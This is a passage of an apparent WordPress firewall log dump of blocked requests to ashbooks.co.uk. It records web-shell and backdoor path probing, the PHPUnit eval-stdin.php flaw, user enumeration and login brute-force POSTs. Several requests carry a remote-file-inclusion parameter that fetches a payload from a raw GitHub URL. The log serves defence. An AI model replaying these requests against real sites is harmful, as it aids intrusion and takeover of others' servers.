10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','MPdLiz1SfpuqAo5OF6k803Qc',0,1637092860.5678,386,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/larva.php?idb=https://raw.githubusercontent.com/carlosdechia/carlosdechia/main/ExV1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','hcBmYglZwd897H52FteCGUIi',0,1637092863.2735,383,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/th3_err0r.php?php=https://raw.githubusercontent.com/carlosdechia/carlosdechia/main/ExV1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','fFT9h4P1aVYWlLme2wj0KcMO',0,1637092866.0427,386,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/alfindex.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','srH1XuIqCwM2im8jEVlpYtQy',0,1637092868.8386,433,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/alfa.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','n4DN1aMCb5VZ8BdwUKHrlEWe',0,1637092871.3909,383,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-booking.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','8s1NMSJETnc6a3tYLHpvmIQw',0,1637092874.1189,406,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/cindex.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','WQSjwn4CE6AFUgOoRDXx8trf',0,1637092883.8315,397,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-content/wp-1ogin_bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','sDl9wZOdSzo4KMc7IXmW1P53',0,1637092887.0535,415,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-1ogin_bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','FdUmrVTED8GOyfZpu1icPbaK',0,1637092889.5056,383,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-includes/fonts/css.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','BbscrlXoUKw34ExfpzjYSeAL',0,1637092891.9517,399,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-includes/css/css.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','8JjSr6dCv0tu49KPFApLezs5',0,1637092894.6922,425,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/old-index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','pfmA25OPUvZiRnXNQF6cWYxj',0,1637092908.1931,401,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/config.bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','UiP6AneXsa1BlCfZYtN5zWSR',0,1637092910.8021,422,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-admin/config.bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','m6ExPjuBH5UFJlw2RrKhaY8X',0,1637092913.0123,439,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-content/config.bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','jqVBAZGrMz4OHFCdK9N7o5wT',0,1637092915.5261,417,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-includes/config.bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','O2EoXFJtLur5PTaq9SwU3vCV',0,1637092918.8304,432,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-content/themes/config.bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','L2oZKPiHu3eBDg15jUM9EzWh',0,1637092921.6100,409,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-content/plugins/config.bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','QGRHhM7umJxF1Sv5AwiPYKzy',0,1637092924.1887,386,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-includes/css/wp-config.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','XS4O7qtQx823UrKfuFbeHizI',0,1637092925.9942,391,'','POST',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-content/plugins/ubh/up.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','Ba39OjLfYHs7EDxAyP0I1rNo',0,1637092928.2666,409,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-includes/wpconfig.bak.php?act=sf','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','8BGfCT7dQhuOcFEeyI5WzwA1',0,1637092930.9276,416,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-content/plugins/wpconfig.bak.php?act=sf','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','7dweXFNa9W6YyICj8QnoTBib',0,1637092933.0020,463,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/haders.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','F8e6JwmDcsUiRdqtzhkHbLYB',0,1637092939.4334,624,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-content/wp-old-index.php?action=login&pass=-1&submit=','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','GiTz1uymBesLkhdlPOJ7XCWF',0,1637092942.3197,412,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/legion.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','XYBLT436Qzh2irOqbCS9xfUE',0,1637092953.3558,438,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-content/mu-plugins/db-safe-mode.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','DZXu5khoJrpOjyHc6GsPnzSl',0,1637092956.3468,766,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-includes/lfx.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','c9Fxh1WLaK3kv0wlRz6gAOCP',0,1637092960.1159,418,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-includes/small.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','GshT8kvRaoSNFqYKwl4Ep2C1',0,1637092962.9642,336,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/up.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','UkSvDm87j69YqbQ0ipOGKfRz',0,1637092965.0767,416,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/upload.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','SZEYx7gD9h4zRLKIkcHOm23f',0,1637092967.2973,402,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/config.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','YaxkwD0b5t6PKNLGCFpBOgni',0,1637092969.7978,441,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/test.php?Ghost=send','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','6EPVIH7dOkgZA08WrSlM9B4z',0,1637092972.5176,420,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-content/langar.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','WSkdMbcIUVtOYR5gomFv1wDx',0,1637092989.1941,458,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','0RhodM6lN1AkibVSeIYzPpaQ',0,1637092991.2426,1197,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-content/plugins/fancy-product-designer/inc/custom-image-handler.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','0hZbuCTgy1NFEeqVl9n3Wx64',0,1637092994.6381,133,'','GET',403,0,700,0,1,'',0),('198.1.119.72',3321984840,'','https://ashbooks.co.uk/wp-content/plugins/wp-striplple/striplple.php','','{\"1\":\"Mozilla\\/5.1 (Windows NT 6.0; WOW64) AppleWebKit\\/533.36 (KHTML, like Gecko) Chrome\\/46.0.2754.75 Safari\\/533.36\",\"2\":\"ashbooks.co.uk\"}','OvBaq8XdLJpE1U9xF4ozhuZS',0,1637093164.5065,946,'','POST',403,0,700,0,1,'',0),('198.1.119.72',3321984840,'','https://ashbooks.co.uk/wp-stream.php','','{\"1\":\"Mozilla\\/5.1 (Windows NT 6.0; WOW64) AppleWebKit\\/533.36 (KHTML, like Gecko) Chrome\\/46.0.2754.75 Safari\\/533.36\",\"2\":\"ashbooks.co.uk\"}','8Esj5q9HUm1zRO0DASZdPwKI',0,1637093206.0540,378,'','GET',403,0,700,0,1,'',0),('198.1.119.72',3321984840,'','https://ashbooks.co.uk/wp-stream.php','','{\"1\":\"Mozilla\\/5.1 (Windows NT 6.0; WOW64) AppleWebKit\\/533.36 (KHTML, like Gecko) Chrome\\/46.0.2754.75 Safari\\/533.36\",\"2\":\"ashbooks.co.uk\"}','CP34hYauniVmQ5kIqrJjeRvK',0,1637093205.0482,1395,'','POST',403,0,700,0,1,'',0),('198.1.119.72',3321984840,'','https://ashbooks.co.uk/wp-content/plugins/wp-striplple/striplple.php','','{\"1\":\"Mozilla\\/5.1 (Windows NT 6.0; WOW64) AppleWebKit\\/533.36 (KHTML, like Gecko) Chrome\\/46.0.2754.75 Safari\\/533.36\",\"2\":\"ashbooks.co.uk\"}','SA40jLCgRmFyetkqOx6Q7VpT',0,1637093441.8555,560,'','GET',403,0,700,0,1,'',0),('69.30.217.108',1159649644,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (iPhone; CPU iPhone OS 7_1 like Mac OS X) AppleWebKit\\/537.51.2 (KHTML, like Gecko) Version\\/7.0 Mobile\\/11D167 Safari\\/9537.53\"}','SZJeT3rpzQBwhE1lcmAHvXOb',0,1637093770.4282,160,'','POST',403,0,600,0,1,'',0),('69.30.217.108',1159649644,'','https://www.ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:30.0) Gecko\\/20100101 Firefox\\/30.0\"}','MBpzlda2o4U017Ly85hkrqOZ',0,1637098484.2073,409,'','POST',403,0,600,0,1,'',0),('69.30.240.27',1159655451,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident\\/6.0)\"}','xW1MblVSqnRTcezKj2rZ9NIy',0,1637099259.2816,442,'','POST',403,0,600,0,1,'',0),('23.23.6.16',387384848,'','https://ashbooks.co.uk//wp-json/wp/v2/users/','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.149 Safari\\/537.36\"}','aIPm86fb1GBY4DZuskynQrN5',0,1637102450.5188,182,'','GET',403,0,520,0,1,'',0),('192.187.118.205',3233511117,'','https://www.ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.143 Safari\\/537.36\"}','QMpxhrAEC7ctkd0HlzWFXVgn',0,1637104263.4581,163,'','POST',403,0,600,0,1,'',0),('69.30.231.158',1159653278,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.125 Safari\\/537.36\"}','SXDvUiwAu6EcQWBhHRlbqYn8',0,1637104922.7323,202,'','POST',403,0,600,0,1,'',0),('69.197.160.227',1170579683,'','https://www.ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (iPhone; CPU iPhone OS 7_1_1 like Mac OS X) AppleWebKit\\/537.51.2 (KHTML, like Gecko) Version\\/7.0 Mobile\\/11D201 Safari\\/9537.53\"}','OVzb6v5HN9lreaShi8uWFdTM',0,1637109761.6790,207,'','POST',403,0,600,0,1,'',0),('192.187.127.21',3233513237,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.125 Safari\\/537.36\"}','XVLnjeIo06hYuQzwpiNgAEMP',0,1637110351.9518,173,'','POST',403,0,600,0,1,'',0),('192.187.118.205',3233511117,'','https://www.ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit\\/537.78.2 (KHTML, like Gecko) Version\\/7.0.6 Safari\\/537.78.2\"}','Ie0xg1thQZwVqGbHkS4yL9Ui',0,1637115443.8077,172,'','POST',403,0,600,0,1,'',0),('192.187.127.21',3233513237,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko\\/20100101 Firefox\\/30.0\"}','xAI2m6fYT0P9OERLcJtpNKB4',0,1637116612.3437,453,'','POST',403,0,600,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/style.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','V9aIdchE2gPv6x7Ab3zTuFX1',0,1637119650.3656,700,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/moduless.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','l6CI0ZF5afW3rQhny4OV7mBS',0,1637119653.0176,556,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-content/plugins/t_file_wp/t_file_wp.php?test=hello','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','4jNCoSIGAP90bWMi2EmZeJxf',0,1637119655.2677,455,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/admin.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','kgYWoGxLyz7NtFSw6MV4P2ji',0,1637119657.2918,527,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/boom.php?x','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','nbT3eL6Mc0azOtJfvWYKrgCw',0,1637119663.7213,451,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-content/plugins/backup_index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','bn6amXhwJHyeE9lOxvNVWIqA',0,1637119665.8289,506,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-content/db_cache.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','6VqfD3b1IcCdZxweYaTJiUyN',0,1637119668.3473,488,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-content/plugins/ioptimization/IOptimize.php?rchk','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','Z61G2KAMOLDmVgkbHC3zxh9t',0,1637119670.5641,514,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wpindex.php?idb=https://raw.githubusercontent.com/carlosdechia/carlosdechia/main/ExV1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','MjwCPaTQXozmci4LUkg0qVpH',0,1637119675.3940,543,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/larva.php?idb=https://raw.githubusercontent.com/carlosdechia/carlosdechia/main/ExV1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','BVQbkodeSTNK1mXUHRn6sOPw',0,1637119677.5326,516,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/th3_err0r.php?php=https://raw.githubusercontent.com/carlosdechia/carlosdechia/main/ExV1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','vxgj8dsIG2AnCEYZQp3Wmqy0',0,1637119679.8976,552,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/alfindex.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','qvly3JmTE12RcZbQwB6nP0Mj',0,1637119682.3905,519,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/alfa.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','tbfo38wZC6qpO9sXFK5yW1HA',0,1637119684.5249,487,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-booking.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','cfv0yjOq8HVMFZCgbASLt7Wr',0,1637119686.9419,352,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/cindex.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','Tjrbigh1fUHFGVu6eP7mXvq9',0,1637119688.6498,412,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-content/wp-1ogin_bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','K35ugvl0aSRWkoz7cxr9bONC',0,1637119690.7423,443,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-1ogin_bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','b7PFk2YZgdzDCaRSfoLvcsGy',0,1637119692.4392,342,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-includes/fonts/css.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','jrxgQlfIYCdTs5ZmzXMRon9H',0,1637119694.5154,530,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-includes/css/css.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','Omt0CW8PFipae5NhXDBcZj7d',0,1637119696.7634,532,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/old-index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','lrYXeD0B3CStgbyNZUpE5qR2',0,1637119700.1480,493,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/config.bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','S8pjUd4THfGI61y0sRavhiWg',0,1637119702.7788,362,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-admin/config.bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','sVEMyd4A0D5ZeXgPbJBUYctS',0,1637119704.8637,131,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-content/config.bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','mNy3g5qXkvAJG9xVewIOPu2R',0,1637119706.3842,507,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-includes/config.bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 